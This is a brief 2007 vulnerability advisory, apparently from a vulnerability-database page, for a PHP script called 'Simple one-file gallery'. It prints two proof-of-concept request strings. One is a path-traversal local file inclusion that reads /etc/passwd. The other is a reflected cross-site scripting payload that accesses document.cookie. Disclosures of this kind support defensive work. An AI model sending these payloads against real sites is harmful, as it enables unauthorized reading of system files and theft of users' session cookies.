Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16178
HistoryFeb 25, 2007 - 12:00 a.m.

Simple one-file gallery

2007-02-2500:00:00
vulners.com
15

local file include:
/gallery.php?f=…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd

xss via php error :
/gallery.php?f=</textarea>'"><script>alert(document.cookie)</script>

regards laurent gaffie